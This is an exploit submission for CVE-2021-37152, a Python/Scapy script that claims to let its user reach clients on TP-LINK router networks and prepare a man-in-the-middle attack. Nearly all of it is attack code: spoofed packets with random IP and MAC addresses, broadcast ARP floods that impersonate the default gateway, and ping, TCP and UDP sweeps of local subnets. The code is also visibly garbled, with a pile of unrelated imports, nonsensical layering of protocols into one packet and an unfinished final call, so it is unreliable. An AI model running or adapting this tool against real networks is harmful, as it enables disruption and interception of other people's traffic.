# Exploit Title: Accsess network clients by sending packets in wirless TP-LINK and preparing for a mitm attack # Date: 05.05.2021 # Exploit Author: Michael Alamoot (lhashashinl) # Vendor Homepage: https://github.com/lhashashinl/CVE-2021-37152/ # Software Link: https://github.com/lhashashinl/CVE-2021-37152/CVE-2021-37152.py # Version: 1.1.1 # Tested on: 5.10.0-kali7-amd64 # CVE: CVE-2021-37152 # Documentation: https://github.com/lhashashinl/CVE-2021-37152/README.md # ========================================= #!/usr/bin/env python3 # DEVELOPER Hashashin # import library py # banner # This exploit is designed for accessing and scanning network clients # and you will easily access and prepare for a mitm attack, # the exploit will attack in layers three and two, you will learn more # in the following, this exploit will be performed on most devices The range # in the tested models is as follows and attack options # TP-LINK 54Mbps Wirless ADSL2+ Modem Router TD-W8901G power 9V == 0.85A , # TD-W9960-v1.20 , TP-LINK TL-WR840N300Mbps New Design Wireless N Router # Exploit works on most devices tested on these models # ======================================================== # import from itertools import count import socket from scapy.all import * from scapy import * import sys , os , qrcode , weakref , quopri , networkx import socketserver ,sockshandler , socket , _socket from scapy import asn1fields , _version_from_git_describe from colorama import Fore , init , Back , colorama_text from sys import argv , set_asyncgen_hooks , hash_info import aiohttp , aioconsole , requests import random , re , readline , subprocess import fabric , ftplib , icalendar , hashid # lhashashinl <--~M---> # ================================================== # hex rawpyload = """ \x00\x00V\x04W\x00\x00c\x06^3\xcc\xc1f\xa8\xc0\xa8\x01\x06$ \x04\x00\x16\x00\x0009\x00\x00\x00dP\x02\x03\xe8a\xfd\x00\ x00\x08\x00\xa0\xea\x00\x00\x00\x00\x00\x01\x08\x00\x06\x04\ x00\x01\xfc\xf8\xae\x0f\xb1\xd0\xc0\xa8\x01\x01\xff\xff\xff\ xff\xff\xff\xc0\xa8\x01\x06\x005\x005\x00\n\x00\x00hi""" hexdumpPyload = """ 0000 45 00 00 5B 04 57 00 00 63 06 FD A9 FA 4D 99 A0 E..[.W..c....M.. 0010 C0 A8 01 06 31 94 00 16 00 00 30 39 00 00 00 64 ....1.....09...d 0020 50 02 03 E8 F3 E3 00 00 08 00 8B 17 00 00 00 00 P............... 0030 00 01 08 00 06 04 00 01 FC F8 AE 0F B1 D0 C0 A8 ................ 0040 01 01 FF FF FF FF FF FF C0 A8 01 06 00 35 00 35 .............5.5 0050 00 0F 00 00 4D 69 63 68 61 65 6C ....Michael """ # ================================================== # Attack class exploit: # class """<--DOC-->""" def __init__(self , target ,com=None , hand=False , end=True ,*args, **kwargs): # function self.target = target self.ipr = RandIP() # Random IP self.ip6R = RandIP6() # Random IP6 self.macr = RandMAC() # Random MAC self.byteR = RandByte() # Random Byte self.shortr = RandShort() # Random short self.binR = RandBin() # Random binR def pyload(self , message , DefaultGetway , interface , count, countLeyer2 , *args, **kwargs): # fanctio pyload = IP(src=self.ipr,dst=self.target,id=1111,ttl=99,ihl=None,len=None)/TCP(sport=self.shortr,dport=[22,80],seq=12345,ack=100,window=1000,flags="S",dataofs= None)/ICMP(type = "echo-request" , code=0)/ARP(psrc=DefaultGetway,hwdst="ff:ff:ff:ff:ff:ff",pdst=self.target , hwlen= None, plen= None)/UDP(len= None,chksum= None)/f"{message}" pyloadLeyer2 = Ether(src=self.macr , dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="255.255.255.255",hwdst="ff:ff:ff:ff:ff:ff",hwlen= None, plen= None) # pyload leyer 2 ipm = subprocess.getoutput("hostname -I") try: send(pyload , count=count , verbose=None , realtime=None , socket=None , iface=interface) # send packet for i in range(int(count)): print(f"\033[100;37;1m PYLOAD \033[0m send packet {ipm}to: {self.target} inteface={interface} count={count} ttl=99 ") except: for i in range(int(count)): print(f"\033[40;31;1m FAILED \033[0m send packet {ipm}to: {self.target} inteface={interface} count={count} ttl=99 ") try: sendp(pyloadLeyer2 , inter=.001 , iface=interface , count=countLeyer2 , socket=None) # send packet leyer 2 for n in range(int(countLeyer2)): print(f"\033[41;37;1m PYLOAD \033[0m send packet {ipm}to: {self.target} inteface={interface} count={countLeyer2} ttl=99 ") except: for n in range(int(countLeyer2)): print(f"\033[40;31;1m FAILED \033[0m send packet {ipm}to: {self.target} inteface={interface} count={countLeyer2} ttl=99 ") return pyload # return pyload <---M---> def scanARP(self): ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2) # packet arp ans.summary(lambda s,r: r.sprintf("%Ether.src% %ARP.psrc%") ) # scaning by arp return ans # return ans def scanICMP(self): ans, unans = sr(IP(dst="192.168.1.1-254")/ICMP()) # packet icmp ans.summary(lambda s,r: r.sprintf("%IP.src% is alive") ) # scaning by icmp return ans # return ans def scanTCP(self): ans, unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") ) # packet tcp ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") ) # scaning by tcp return ans # return ans def scanUDP(self): ans, unans = sr( IP(dst="192.168.*.1-10")/UDP(dport=0) ) # packet udp ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") ) # scanning by udp return ans # return ans e = exploit(target="") e.pyload(message="" , DefaultGetway="" , interface="" , count= , countLeyer2=)